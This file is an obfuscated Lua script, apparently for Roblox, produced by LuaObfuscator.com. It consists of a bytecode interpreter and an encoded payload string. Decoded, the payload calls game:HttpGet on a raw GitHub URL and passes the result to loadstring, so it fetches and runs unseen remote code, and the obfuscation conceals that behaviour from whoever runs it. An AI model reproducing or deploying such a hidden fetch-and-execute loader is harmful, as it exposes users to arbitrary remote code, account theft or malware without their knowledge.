--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v86=v5(v80,v19);v19=nil;return v86;else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/((1 + 1)^(v32-(2 -(1 + 0)))))%(2^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v81-(v81%(620 -(555 + 64))) ;else local v82=931 -(857 + 74) ;local v83;while true do if (v82==((2473 -1905) -(82 + 285 + 201))) then v83=(929 -(214 + 713))^(v32-1) ;return (((v31%(v83 + v83))>=v83) and ((1183 -(32 + 85)) -(68 + 997))) or (1270 -(226 + 1044)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + 2 ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37=0;local v38;local v39;local v40;local v41;while true do if (v37==((1 + 0) -0)) then return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 263))) + (v39 * (1017 -761)) + v38 ;end if (v37==(180 -(67 + 113))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;v37=2 -1 ;end end end local function v24() local v42=v23();local v43=v23();local v44=953 -(802 + 65 + 85) ;local v45=(v20(v43,2 -1 ,36 -16 ) * ((2 + 0)^(1029 -(915 + (512 -(44 + 386)))))) + v42 ;local v46=v20(v43,59 -38 ,19 + (20 -8) );local v47=((v20(v43,41 -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * (0 + (1486 -(998 + 488))) ;else v46=792 -((806 -(145 + 293)) + 423) ;v44=0 -0 ;end elseif (v46==(2065 -(10 + 3 + 5))) then return ((v45==0) and (v47 * (1/((0 + 0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1465 -(416 + 26)) ) * (v44 + (v45/(2^(165 -113)))) ;end local function v25(v48) local v49=772 -(201 + 571) ;local v50;local v51;while true do if (v49==3) then return v6(v51);end if (v49==(0 + 0)) then v50=nil;if  not v48 then local v94=1138 -(116 + 1022) ;while true do if (v94==(0 -0)) then v48=v23();if (v48==0) then return "";end break;end end end v49=1;end if (v49==(2 + 0)) then v51={};for v87=3 -2 , #v50 do v51[v87]=v2(v1(v3(v50,v87,v87)));end v49=10 -7 ;end if (v49==((1745 -(261 + 624)) -(814 + 45))) then v50=v3(v16,v18,(v18 + v48) -((3 -1) -1) );v18=v18 + v48 ;v49=1 + (1081 -(1020 + 60)) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=1587 -(412 + 1175) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(0 -0)) then v53=0 + 0 ;v54=nil;v52=1;end if (v52==1) then v55=nil;v56=nil;v52=9 -7 ;end if (v52~=(4 -2)) then else v57=nil;v58=nil;v52=3;end if (v52~=3) then else v59=nil;while true do local v89=0 + 0 ;while true do if (v89==(0 + 0)) then if (v53==(0 -0)) then local v97=1274 -(388 + 886) ;local v98;while true do if (v97~=0) then else v98=0 -0 ;while true do if (v98==(1203 -(373 + 829))) then local v136=0;while true do if (v136~=(0 + 0)) then else v56={};v57={v54,v55,nil,v56};v136=1 + 0 ;end if (v136==(1 + 0)) then v98=3 -1 ;break;end end end if (v98~=(1467 -(899 + 568))) then else local v137=0;while true do if (v137~=(0 -0)) then else v54={};v55={};v137=1 + 0 ;end if (v137~=(2 -1)) then else v98=604 -(268 + 335) ;break;end end end if (v98==(292 -(60 + 230))) then v53=337 -(144 + 192) ;break;end end break;end end end if (v53~=(573 -(426 + 146))) then else local v99=0 + 0 ;local v100;while true do if (v99~=0) then else v100=0;while true do if (v100~=(1 + 0)) then else local v138=0 + 0 ;while true do if (v138~=(1505 -(363 + 1141))) then else v100=2;break;end if (v138~=(0 + 0)) then else for v158=1457 -(282 + 1174) ,v58 do local v159=0 + 0 ;local v160;local v161;local v162;local v163;local v164;while true do if (v159~=(813 -(569 + 242))) then else v164=nil;while true do if (v160==(0 -0)) then local v171=0;while true do if (v171==(1 + 0)) then v160=1976 -(1913 + 62) ;break;end if (v171~=(0 + 0)) then else v161=1024 -(706 + 318) ;v162=nil;v171=1 + 0 ;end end end if (v160~=(1253 -(721 + 530))) then else while true do if ((1271 -(945 + 326))==v161) then v162=0 -0 ;v163=nil;v161=1 + 0 ;end if (v161==1) then v164=nil;while true do if (v162==(1662 -(1477 + 184))) then if (v163==(701 -(271 + 429))) then v164=v21()~=0 ;elseif (v163==2) then v164=v24();elseif (v163~=(3 + 0)) then else v164=v25();end v59[v158]=v164;break;end if (v162~=0) then else local v173=1500 -(1408 + 92) ;local v174;local v175;while true do if (v173==(1086 -(461 + 625))) then v174=1288 -(993 + 295) ;v175=nil;v173=1 + 0 ;end if (v173~=(1 -0)) then else while true do if (v174==0) then v175=1171 -(418 + 753) ;while true do if (v175~=(0 -0)) then else v163=v21();v164=nil;v175=1 + 0 ;end if (v175~=(1 + 0)) then else v162=1 + 0 ;break;end end break;end end break;end end end end break;end end break;end if (v160~=(1 + 0)) then else v163=nil;v164=nil;v160=1 + 1 ;end end break;end if (v159~=(477 -(41 + 435))) then else v162=nil;v163=nil;v159=2;end if (v159~=(529 -(406 + 123))) then else v160=1001 -(938 + 63) ;v161=nil;v159=1 + 0 ;end end end v57[1128 -(936 + 189) ]=v21();v138=1;end end end if (v100~=2) then else v53=1 + 1 ;break;end if (v100==(1769 -(1749 + 20))) then local v139=0 + 0 ;while true do if (v139~=1) then else v100=1 + 0 ;break;end if (v139==(1322 -(1249 + 73))) then v58=v23();v59={};v139=1 + 0 ;end end end end break;end end end v89=268 -(176 + 91) ;end if (v89~=(1146 -(466 + 679))) then else if ((4 -2)~=v53) then else local v101=0;while true do if (v101~=(2 -1)) then else return v57;end if (v101==(1900 -(106 + 1794))) then local v104=0;while true do if (v104==0) then for v140=1 + 0 ,v23() do local v141=0 + 0 ;local v142;local v143;while true do if ((2 -1)==v141) then while true do if (v142~=(0 + 0)) then else v143=v21();if (v20(v143,2 -1 ,115 -(4 + 110) )~=(584 -(57 + 527))) then else local v165=1427 -(41 + 1386) ;local v166;local v167;local v168;local v169;local v170;while true do if (v165~=(1020 -(697 + 321))) then else v170=nil;while true do if (v166~=2) then else while true do if (v167==(5 -3)) then if (v20(v169,1,104 -(17 + 86) )~=(1 + 0)) then else v170[2]=v59[v170[3 -1 ]];end if (v20(v169,2,5 -3 )==1) then v170[6 -3 ]=v59[v170[3]];end v167=169 -(122 + 44) ;end if (v167~=(5 -2)) then else if (v20(v169,5 -2 ,3)==1) then v170[12 -8 ]=v59[v170[4]];end v54[v140]=v170;break;end if (v167==(1228 -(322 + 905))) then local v177=0 + 0 ;local v178;while true do if ((0 + 0)==v177) then v178=0 -0 ;while true do if (v178==(611 -(602 + 9))) then local v187=65 -(30 + 35) ;while true do if ((0 + 0)==v187) then v170={v22(),v22(),nil,nil};if (v168==0) then local v189=580 -(361 + 219) ;local v190;local v191;local v192;while true do if (1==v189) then v192=nil;while true do if (v190~=(320 -(53 + 267))) then else local v195=1898 -(260 + 1638) ;while true do if (v195==(441 -(382 + 58))) then v190=3 -2 ;break;end if (v195~=0) then else v191=0 + 0 ;v192=nil;v195=414 -(15 + 398) ;end end end if (v190==(1 -0)) then while true do if ((982 -(18 + 964))==v191) then v192=0 -0 ;while true do if (v192~=0) then else v170[2 + 1 ]=v22();v170[9 -5 ]=v22();break;end end break;end end break;end end break;end if (v189~=(0 + 0)) then else v190=0 + 0 ;v191=nil;v189=851 -(20 + 830) ;end end elseif (v168==(1 + 0)) then v170[1466 -(1404 + 59) ]=v23();elseif (v168==(128 -(116 + 10))) then v170[1 + 2 ]=v23() -((767 -(468 + 297))^(754 -(542 + 196))) ;elseif (v168==(6 -3)) then local v196=0 + 0 ;local v197;local v198;local v199;while true do if ((1 + 0)~=v196) then else v199=nil;while true do if (1~=v197) then else while true do if (v198==(0 + 0)) then v199=0 + 0 ;while true do if (v199==(0 -0)) then v170[7 -4 ]=v23() -((238 -(141 + 95))^(1567 -(1126 + 425))) ;v170[409 -(118 + 287) ]=v22();break;end end break;end end break;end if ((0 -0)~=v197) then else v198=0 -0 ;v199=nil;v197=1 + 0 ;end end break;end if (0~=v196) then else v197=1121 -(118 + 1003) ;v198=nil;v196=2 -1 ;end end end v187=1 + 0 ;end if (v187~=1) then else v178=378 -(142 + 235) ;break;end end end if (v178==(4 -3)) then v167=2 -0 ;break;end end break;end end end if ((0 + 0)~=v167) then else local v179=977 -(553 + 424) ;local v180;while true do if (v179~=0) then else v180=0 -0 ;while true do if (v180~=(0 + 0)) then else local v188=0;while true do if (v188==(163 -(92 + 71))) then v168=v20(v143,2,2 + 1 );v169=v20(v143,6 -2 ,771 -(574 + 191) );v188=1 + 0 ;end if (v188~=(1 + 0)) then else v180=1 + 0 ;break;end end end if ((850 -(254 + 595))==v180) then v167=1;break;end end break;end end end end break;end if (v166==(127 -(55 + 71))) then v169=nil;v170=nil;v166=2 + 0 ;end if ((0 + 0)==v166) then v167=0;v168=nil;v166=1;end end break;end if (v165==(1 -0)) then v168=nil;v169=nil;v165=2;end if (v165==0) then v166=1790 -(573 + 1217) ;v167=nil;v165=1;end end end break;end end break;end if (v141~=(0 -0)) then else v142=0 + 0 ;v143=nil;v141=1 + 0 ;end end end for v144=1 -0 ,v23() do v55[v144-(2 -1) ]=v28();end v104=940 -(714 + 225) ;end if (v104==1) then v101=2 -1 ;break;end end end end end break;end end end break;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v84=0,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + 1 ];else v76[v84]=v73[v84 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v85=0;while true do if (v85==1) then if (v79<=6) then if (v79<=2) then if (v79<=0) then local v102=0;local v103;while true do if (v102==0) then v103=v78[2];v76[v103]=v76[v103](v13(v76,v103 + 1 ,v71));break;end end elseif (v79==1) then local v105=0;local v106;local v107;local v108;local v109;while true do if (v105==0) then v106=v78[2];v107,v108=v69(v76[v106](v13(v76,v106 + 1 ,v78[3])));v105=1;end if (v105==1) then v71=(v108 + v106) -1 ;v109=0;v105=2;end if (v105==2) then for v152=v106,v71 do v109=v109 + 1 ;v76[v152]=v107[v109];end break;end end else v76[v78[2]]=v78[3];end elseif (v79<=4) then if (v79==3) then v76[v78[2]]=v62[v78[3]];else local v114=v78[2];v76[v114]=v76[v114](v13(v76,v114 + 1 ,v71));end elseif (v79>5) then v76[v78[2]]=v78[3];else local v118=0;local v119;local v120;while true do if (v118==0) then v119=v78[2];v120=v76[v78[3]];v118=1;end if (v118==1) then v76[v119 + 1 ]=v120;v76[v119]=v120[v78[4]];break;end end end elseif (v79<=9) then if (v79<=7) then v76[v78[2]]();elseif (v79==8) then do return;end else local v121=v78[2];local v122,v123=v69(v76[v121](v13(v76,v121 + 1 ,v78[3])));v71=(v123 + v121) -1 ;local v124=0;for v134=v121,v71 do local v135=0;while true do if (v135==0) then v124=v124 + 1 ;v76[v134]=v122[v124];break;end end end end elseif (v79<=11) then if (v79>10) then do return;end else local v125=v78[2];local v126=v76[v78[3]];v76[v125 + 1 ]=v126;v76[v125]=v126[v78[4]];end elseif (v79>12) then v76[v78[2]]();else v76[v78[2]]=v62[v78[3]];end v70=v70 + 1 ;break;end if (v85==0) then v78=v66[v70];v79=v78[1];v85=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403523O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6F726A70666F726B6573706F533055305330533053302O492F6F696466676F69743O372F6D61696E2F4F5O4700083O00120C3O00013O00120C000100023O00200A000100010003001202000300044O0001000100034O00045O00022O000D3O000100012O00083O00017O00",v9(),...);
